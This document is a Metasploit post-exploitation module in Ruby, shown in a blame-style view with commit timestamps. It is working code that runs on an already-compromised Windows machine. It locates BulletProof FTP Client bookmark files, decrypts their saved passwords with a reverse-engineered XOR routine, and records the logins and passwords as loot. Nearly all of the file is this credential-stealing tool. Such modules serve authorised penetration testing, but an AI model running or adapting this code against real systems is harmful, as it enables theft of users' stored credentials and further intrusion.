2013-01-14 12:50:10 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/file'
|
|
|
|
require 'msf/core/post/windows/user_profiles'
|
|
|
|
require 'msf/core/post/windows/registry'
|
|
|
|
require 'msf/core/auxiliary/report'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::UserProfiles
|
|
|
|
include Msf::Post::Windows::Registry
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Gather BulletProof FTP Client Saved Password Extraction',
|
|
|
|
'Description' => %q{
|
|
|
|
This module extracts information from BulletProof FTP Bookmarks files and store
|
|
|
|
retrieved credentials in the database.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'juan vazquez'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
class BookmarksParser
|
|
|
|
|
|
|
|
# Array of entries found after parsing a Bookmarks File
|
|
|
|
attr_accessor :entries
|
|
|
|
|
|
|
|
def initialize(contents)
|
|
|
|
@xor_key = nil
|
|
|
|
@contents_bookmark = contents
|
|
|
|
@entries = []
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_bookmarks
|
2013-01-15 01:05:58 +00:00
|
|
|
if not parse_header
|
2013-01-14 12:50:10 +00:00
|
|
|
return
|
|
|
|
end
|
2013-01-15 01:05:58 +00:00
|
|
|
|
|
|
|
while @contents_bookmark.length > 0
|
|
|
|
parse_entry
|
|
|
|
@contents_bookmark.slice!(0, 25) # 25 null bytes between entries
|
|
|
|
end
|
2013-01-14 12:50:10 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
private
|
|
|
|
|
|
|
|
def low_dword(value)
|
2013-01-14 18:22:02 +00:00
|
|
|
return Rex::Text.pack_int64le(value).unpack("VV")[0]
|
2013-01-14 12:50:10 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def high_dword(value)
|
2013-01-14 18:22:02 +00:00
|
|
|
return Rex::Text.pack_int64le(value).unpack("VV")[1]
|
2013-01-14 12:50:10 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def low_byte(value)
|
|
|
|
return [value].pack("V").unpack("C*")[0]
|
|
|
|
end
|
|
|
|
|
|
|
|
def generate_xor_key
|
2013-01-14 18:43:34 +00:00
|
|
|
# Magic numbers 0x100 and 0x8088405 is obtained from bpftpclient.exe static analysis:
|
|
|
|
#.text:007B13C1 mov eax, 100h
|
|
|
|
# ... later
|
|
|
|
#.text:0040381F imul edx, dword_7EF008[ebx], 8088405h
|
|
|
|
#.text:00403829 inc edx
|
|
|
|
#.text:0040382A mov dword_7EF008[ebx], edx
|
|
|
|
#.text:00403830 mul edx
|
2013-01-14 12:50:10 +00:00
|
|
|
temp = @xor_key * 0x8088405
|
|
|
|
temp = low_dword(temp)
|
|
|
|
temp = temp + 1
|
|
|
|
@xor_key = temp
|
|
|
|
result = temp * 0x100
|
|
|
|
result = high_dword(result)
|
|
|
|
result = low_byte(result)
|
|
|
|
return result
|
|
|
|
end
|
|
|
|
|
|
|
|
def decrypt(encrypted)
|
|
|
|
length = encrypted.unpack("C")[0]
|
2013-01-15 01:05:58 +00:00
|
|
|
return "" if length.nil?
|
2013-01-14 12:50:10 +00:00
|
|
|
@xor_key = length
|
|
|
|
encrypted = encrypted[1..length]
|
2013-01-15 01:05:58 +00:00
|
|
|
return "" if encrypted.length != length
|
2013-01-14 12:50:10 +00:00
|
|
|
decrypted = ""
|
|
|
|
encrypted.unpack("C*").each { |byte|
|
|
|
|
key = generate_xor_key
|
|
|
|
decrypted << [byte ^ key].pack("C")
|
|
|
|
}
|
|
|
|
return decrypted
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_object
|
2013-01-15 01:05:58 +00:00
|
|
|
object_length = @contents_bookmark[0,1].unpack("C")[0]
|
|
|
|
object = @contents_bookmark[0, object_length + 1 ]
|
|
|
|
@contents_bookmark.slice!(0, object_length+1)
|
|
|
|
content = decrypt(object)
|
|
|
|
return content
|
2013-01-14 12:50:10 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def parse_entry
|
|
|
|
site_name = parse_object
|
|
|
|
site_address = parse_object
|
|
|
|
login = parse_object
|
|
|
|
remote_dir = parse_object
|
|
|
|
local_dir = parse_object
|
|
|
|
port = parse_object
|
|
|
|
password = parse_object
|
|
|
|
|
|
|
|
@entries << {
|
|
|
|
:site_name => site_name,
|
|
|
|
:site_address => site_address,
|
|
|
|
:login => login,
|
|
|
|
:remote_dir => remote_dir,
|
|
|
|
:local_dir => local_dir,
|
|
|
|
:port => port,
|
|
|
|
:password => password
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_header
|
|
|
|
signature = parse_object
|
|
|
|
if not signature.eql?("BPSitelist")
|
|
|
|
return false # Error!
|
|
|
|
end
|
|
|
|
|
2013-01-15 01:05:58 +00:00
|
|
|
unknown = @contents_bookmark.slice!(0, 4) # "\x01\x00\x00\x00"
|
|
|
|
return false unless unknown == "\x01\x00\x00\x00"
|
2013-01-14 12:50:10 +00:00
|
|
|
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_installation
|
|
|
|
bullet_reg = "HKCU\\SOFTWARE\\BulletProof Software"
|
|
|
|
bullet_reg_ver = registry_enumkeys("#{bullet_reg}")
|
|
|
|
|
2013-01-14 18:22:02 +00:00
|
|
|
return false if bullet_reg_ver.nil?
|
|
|
|
|
2013-01-14 12:50:10 +00:00
|
|
|
bullet_reg_ver.each { |key|
|
|
|
|
if key =~ /BulletProof FTP Client/
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
}
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_bookmarks(path)
|
|
|
|
|
|
|
|
bookmarks = []
|
|
|
|
|
|
|
|
if not directory?(path)
|
|
|
|
return bookmarks
|
|
|
|
end
|
|
|
|
|
|
|
|
session.fs.dir.foreach(path) do |entry|
|
|
|
|
if directory?("#{path}\\#{entry}") and entry != "." and entry != ".."
|
|
|
|
bookmarks.concat(get_bookmarks("#{path}\\#{entry}"))
|
|
|
|
elsif entry =~ /bpftp.dat/ and file?("#{path}\\#{entry}")
|
|
|
|
vprint_good("BulletProof FTP Bookmark file found at #{path}\\#{entry}")
|
|
|
|
bookmarks << "#{path}\\#{entry}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return bookmarks
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_bulletproof(user_dir)
|
|
|
|
session.fs.dir.foreach(user_dir) do |dir|
|
|
|
|
if dir =~ /BulletProof Software/
|
|
|
|
vprint_status("BulletProof Data Directory found at #{user_dir}\\#{dir}")
|
|
|
|
return "#{user_dir}\\#{dir}"#"\\BulletProof FTP Client\\2010\\sites\\Bookmarks"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
def report_findings(entries)
|
|
|
|
|
|
|
|
if session.db_record
|
|
|
|
source_id = session.db_record.id
|
|
|
|
else
|
|
|
|
source_id = nil
|
|
|
|
end
|
|
|
|
|
|
|
|
entries.each{ |entry|
|
|
|
|
@credentials << [
|
|
|
|
entry[:site_name],
|
|
|
|
entry[:site_address],
|
|
|
|
entry[:port],
|
|
|
|
entry[:login],
|
|
|
|
entry[:password],
|
|
|
|
entry[:remote_dir],
|
|
|
|
entry[:local_dir]
|
|
|
|
]
|
|
|
|
|
|
|
|
report_auth_info(
|
|
|
|
:host => entry[:site_address],
|
|
|
|
:port => entry[:port],
|
|
|
|
:proto => 'tcp',
|
|
|
|
:sname => 'ftp',
|
|
|
|
:user => entry[:login],
|
|
|
|
:pass => entry[:password],
|
|
|
|
:ptype => 'password',
|
|
|
|
:source_id => source_id,
|
|
|
|
:source_type => "exploit"
|
|
|
|
)
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
|
|
|
print_status("Checking if BulletProof FTP Client is installed...")
|
|
|
|
if not check_installation
|
|
|
|
print_error("BulletProof FTP Client isn't installed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Searching BulletProof FTP Client Data directories...")
|
|
|
|
# BulletProof FTP Client 2010 uses User Local Settings to store bookmarks files
|
|
|
|
profiles = grab_user_profiles()
|
|
|
|
bullet_paths = []
|
|
|
|
profiles.each do |user|
|
|
|
|
next if user['LocalAppData'] == nil
|
|
|
|
bulletproof_dir = check_bulletproof(user['LocalAppData'])
|
|
|
|
bullet_paths << bulletproof_dir if bulletproof_dir
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Searching BulletProof FTP Client installation directory...")
|
|
|
|
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
|
2013-01-14 18:22:02 +00:00
|
|
|
program_files_x86 = expand_path('%ProgramFiles(X86)%')
|
|
|
|
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
|
|
|
|
program_files = program_files_x86 #x64
|
2013-01-14 12:50:10 +00:00
|
|
|
else
|
2013-01-14 18:22:02 +00:00
|
|
|
program_files = expand_path('%ProgramFiles%') #x86
|
2013-01-14 12:50:10 +00:00
|
|
|
end
|
|
|
|
session.fs.dir.foreach(program_files) do |dir|
|
|
|
|
if dir =~ /BulletProof FTP Client/
|
|
|
|
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
|
|
|
|
bullet_paths << "#{program_files}\\#{dir}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if bullet_paths.empty?
|
|
|
|
print_error("BulletProof FTP Client directories not found.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Searching for BulletProof FTP Client Bookmarks files...")
|
|
|
|
bookmarks = []
|
|
|
|
bullet_paths.each { |path|
|
|
|
|
bookmarks.concat(get_bookmarks(path))
|
|
|
|
}
|
|
|
|
if bookmarks.empty?
|
|
|
|
print_error("BulletProof FTP Client Bookmarks files not found.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Searching for connections data on BulletProof FTP Client Bookmarks files...")
|
|
|
|
entries = []
|
|
|
|
bookmarks.each { |bookmark|
|
|
|
|
p = BookmarksParser.new(read_file(bookmark))
|
|
|
|
p.parse_bookmarks
|
|
|
|
if p.entries.length > 0
|
|
|
|
entries.concat(p.entries)
|
|
|
|
else
|
|
|
|
vprint_error("Entries not found on #{bookmark}")
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
if entries.empty?
|
|
|
|
print_error("BulletProof FTP Client Bookmarks not found.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# Report / Show findings
|
|
|
|
@credentials = Rex::Ui::Text::Table.new(
|
|
|
|
'Header' => "BulletProof FTP Client Bookmarks",
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
|
|
|
"Site Name",
|
|
|
|
"Site Address",
|
|
|
|
"Port",
|
|
|
|
"Login",
|
|
|
|
"Password",
|
|
|
|
"Remote Dir",
|
|
|
|
"Local Dir"
|
|
|
|
])
|
|
|
|
|
|
|
|
report_findings(entries)
|
|
|
|
results = @credentials.to_s
|
|
|
|
|
|
|
|
print_line("\n" + results + "\n")
|
|
|
|
|
2013-01-15 18:16:32 +00:00
|
|
|
if not @credentials.rows.empty?
|
|
|
|
p = store_loot(
|
|
|
|
'bulletproof.creds',
|
|
|
|
'text/plain',
|
|
|
|
session,
|
|
|
|
@credentials.to_csv,
|
|
|
|
'bulletproof.creds.csv',
|
|
|
|
'BulletProof Credentials'
|
|
|
|
)
|
|
|
|
print_status("Data stored in: #{p.to_s}")
|
|
|
|
end
|
|
|
|
|
2013-01-14 12:50:10 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|